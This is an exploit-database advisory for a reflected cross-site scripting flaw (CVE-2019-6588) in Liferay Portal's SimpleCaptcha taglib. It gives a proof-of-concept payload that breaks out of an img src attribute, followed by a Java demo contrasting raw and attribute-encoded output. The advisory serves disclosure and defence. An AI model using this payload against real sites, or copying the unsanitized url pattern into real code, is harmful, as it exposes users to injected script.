"Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting"

Author

"Valerio Brussani"

Platform

jsp

Release date

2019-06-11

# Exploit Title: Liferay Portal < 7.1 CE GA4 / SimpleCaptcha API XSS
# Date: 04/06/2019
# Exploit Author: Valerio Brussani (@val_brux)
# Website: www.valbrux.it
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://www.liferay.com/it/downloads-community
# Version: < 7.1 CE GA4
# Tested on: Liferay Portal 7.1 CE GA3
# CVE: CVE-2019-6588
# Reference1: https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-71/-/asset_publisher/7v4O7y85hZMo/content/cst-7130-multiple-xss-vulnerabilities-in-7-1-ce-ga3
# Reference2: https://www.valbrux.it/blog/2019/06/04/cve-2019-6588-liferay-portal-7-1-ce-ga4-simplecaptcha-api-xss/


Introduction
In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input 
into the "url" parameter of the JSP taglib call <liferay-ui:captcha url="<%= url %>" /> or <liferay-captcha:captcha url="<%= url %>" />. 
A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability.
 
PoC
In a sample scenario where custom code calls the <liferay-ui:captcha url="<%= url %>" /> JSP taglib, a payload like the following is appended to the body parameters of a customized form:
 
&xxxx%22%3e%3cscript%3ealert(1)</script> 
 
The script is reflected in the src attribute of the <img> tag, which is responsible for fetching the next available captcha:
 
<img alt="xxx" class="xxxx" src="xxxxxx"><script>alert(1)</script>=" />
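
The attribute breakout described above, next to the same value after HTML attribute encoding. This is an added example, not code from the advisory or from Liferay. The escapeAttribute helper, the renderImg model of the tag output and the /captcha/next URL are assumptions made for illustration.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

// Added illustration, not Liferay code: models a tag that writes "url" into <img src="...">.
public class CaptchaUrlEncodingDemo {

    // Minimal HTML attribute encoder (illustrative; use a vetted encoder in real code).
    static String escapeAttribute(String value) {
        StringBuilder out = new StringBuilder(value.length() + 16);
        for (char c : value.toCharArray()) {
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    // Places the value inside a double-quoted src attribute, as in the reflected output above.
    static String renderImg(String url) {
        return "<img alt=\"xxx\" class=\"xxxx\" src=\"" + url + "\" />";
    }

    // True when the rendered markup contains an element start after the opening <img.
    static boolean injectsMarkup(String html) {
        return html.indexOf('<', 1) >= 0;
    }

    public static void main(String[] args) {
        // Constructed input: hypothetical captcha URL plus the suffix quoted in the PoC.
        String suffix = URLDecoder.decode(
                "&xxxx%22%3e%3cscript%3ealert(1)</script>", StandardCharsets.UTF_8);
        String url = "/captcha/next?t=0" + suffix;

        String raw = renderImg(url);                      // unsanitized, as in the advisory
        String encoded = renderImg(escapeAttribute(url)); // encoded before it reaches the tag

        System.out.println(raw);
        System.out.println("extra markup: " + injectsMarkup(raw));
        System.out.println(encoded);
        System.out.println("extra markup: " + injectsMarkup(encoded));
    }
}
```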